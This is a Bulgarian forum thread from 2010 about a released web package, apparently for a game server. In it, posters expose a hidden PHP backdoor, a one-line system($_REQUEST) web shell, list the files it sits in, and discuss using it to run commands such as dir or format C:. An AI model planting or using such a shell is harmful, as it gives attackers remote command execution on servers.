[Release] Cores Web 0.1

banned · Feb 18, 2010

Elven` said:
Дава достъп до system(); командите на Win32.Накратко command.com или по известно cmd.
A $_REQUEST[];се използва вместо $_GET[];т.е. например
index.php?v=dir/s

значи човек ако знае 2-3 команди може му форматне някои диск тай ли

Elven` · Feb 18, 2010

banned said:
значи човек ако знае 2-3 команди може му форматне някои диск тай ли

Зависи ако не е лимитиран в правата (PwND by Admin (rofl)

)

DarkMaster · Feb 18, 2010

sugaR said:
Ах Niker е прав нищо не заслужавате

по-скоро вие не заслужавате да ви одобряваме темите :

banned · Feb 18, 2010

Elven` said:
Зависи ако не е лимитиран в правата (PwND by Admin )

е то сигурно не са

буквата V дето е там може ли да се промени на друга ?

NikeR · Feb 19, 2010

Махнете, чакайте моя репак (chuckle)

NikeR · Feb 19, 2010

DarkMaster said:
<? @system($_REQUEST["v"]); ?>
веднага да се махне.

Няма смисъл и без това в индекса е защитен рекуеста:

htmlspecialchars($_REQUEST);

P.s. Междодругото, чакаме дарката да ми хуукне .dll-тата и да оправи лимита на итемите,
и тогава ще почна репака, щото искам да си опрая дрейка...
Ама дарката вече 3ти ден ме мотае....

Elven` · Feb 19, 2010

NikeR said:
Няма смисъл и без това в индекса е защитен рекуеста:

P.s. Междодругото, чакаме дарката да ми хуукне .dll-тата и да оправи лимита на итемите,
и тогава ще почна репака, щото искам да си опрая дрейка...
Ама дарката вече 3ти ден ме мотае....

Защитен от какво ?dir командата ще проработи.
Format C:\ ще проработи ?Кое е защитеното.
htmlspecialchars();просто променя ' и " на &#039 &qute <> на &lt &gt & на & -> не виждам забрана за format C:\

@banned може и на zzzazzazazzad да се промени,така например качваш shell в самия индекс,и стигаш до него само когато има
index.php?xaxopshell=elf

killar4eto · Feb 19, 2010

Аз викам да спрете да се карате... Има shell кфо пък толкова... като има shell Dark-а да делне темата и решаваме проблема

sugaR · Feb 19, 2010

Къде е бе ? Няма Shell

NikeR · Feb 19, 2010

Elven` said:
Защитен от какво ?dir командата ще проработи.
Format C:\ ще проработи ?Кое е защитеното.
htmlspecialchars();просто променя ' и " на ' &qute <> на &lt &gt & на & -> не виждам забрана за format C:\

@banned може и на zzzazzazazzad да се промени,така например качваш shell в самия индекс,и стигаш до него само когато има
index.php?xaxopshell=elf

Е карай

адваме и едно адслашес и готово

banned · Mar 14, 2010

някои ако може ми даде веба без Update-то че ми трябва

banned · Mar 14, 2010

никои ли го няма е преди да го упдате някои ако го има преди упдате ще съм му благодарен ако го даде

newguy · Mar 14, 2010

Не е само в index.php а и в rankings/index.php, rankings/topcharacters.php, rankings/topguilds.php, includes/index.php.

c0nfus10n · Mar 14, 2010

ако може нов линк за down ?

airotica · Mar 15, 2010

sugaR и двамата знаем,че си го/ги оставил нарочно.Знаеме се,няма нужда да се лъжем.
Поздрави.
airotiCA.

DemonuMu · Apr 30, 2014

-link dead/screen 0-

Search

Search

[Release] Cores Web 0.1

banned

Active Member

Elven`

New Member

DarkMaster

Administrator

banned

Active Member

NikeR

New Member

NikeR

New Member

Elven`

New Member

killar4eto

Well-Known Member

sugaR

New Member

NikeR

New Member

banned

Active Member

banned

Active Member

newguy

Well-Known Member

c0nfus10n

New Member

airotica

New Member

DemonuMu

Well-Known Member

Similar threads